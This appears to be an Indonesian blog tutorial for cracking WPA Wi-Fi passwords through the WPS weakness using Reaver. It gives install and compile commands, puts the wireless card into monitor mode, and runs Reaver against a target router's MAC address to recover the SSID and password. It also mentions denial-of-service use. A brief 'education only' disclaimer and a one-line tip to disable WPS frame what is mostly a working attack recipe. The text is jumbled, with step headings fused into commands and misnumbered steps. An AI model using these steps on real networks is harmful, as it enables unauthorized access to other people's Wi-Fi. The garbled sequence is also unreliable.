Warning: Panduan ini hanya menunjukan kelemahan Wifi security standars dan murni hanya untuk edukasi. Jika anda berniat lebih, stop membaca sampai disini. Hacking ini ditampilakan di Shmoocon 2012.
Metode ini hanya jalan pada router WPA yang memilisi support WPS. Sebagian besar router sejak 2008 memiliki WPS yang diaktifkan
Downloads & setup:
- Saya menggunakan Ubuntu 11.10, tapi bisa juga digunakan distro lainnya. Instalasi harus nativ, tidak bisa lewat VMware atau virtual box.
- libpcap, traffic capture library, tersedia via Ubuntu’s software center, atau ikuti langkah 1.
- Download Reaver, tool to trigger WPS attack (Open Source).
sudo apt-get updateLangkah 2. Cara kompilasi Reaper:
sudo apt-get install build-essential
sudo apt-get install flex bison
sudo apt-get install libpcap-dev
sudo apt-get install libpcap3-dev
sudo apt-get install libsqlite3-dev
sudo apt-get install libnl2-dev
Pastikan build-essential telah terinstall, kemudian lakukan perintah berikut (di asumsikan reaver di ekstak ke desktop:
cd ~/Desktop/reaver-1.4/srcLangkah 3. Identifikasi MAC address dari router target.
./configure
make
sudo make install
Anda dapat menggunakan software wifi Scanner seperti iwScanner (download) untuk mencatat MAC address dari target Wifi SSID.
Langkah 4. Buat Wireless card menjadi monitor mode.
sudo ifconfig wlan0 downLangkah 5. Mulai serangan:
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
Reaver hanya memerlukan dua input untuk serangan, interface dan MAC address:
sudo reaver -i wlan0 -b 00:01:02:03:04:05Ada beberapa pilihan yang digunakan, tapi saya akan mencoba tetap menyederhanakan. Anda harus mencoba berulang kalai seperti pause, resume crack. Proses crack akan terus berlanjut bisa sampai beberapa jam,
Langkah 4. Setelah serangan selesai akan dihasilkan SSID dan password authentikasi dari network target
Tools ini juga bisa untu denial of service DoS attack.
Pencegahan WPA2 WPS dari serangan: Non aktifkan mode WPS di router
Sumber: asal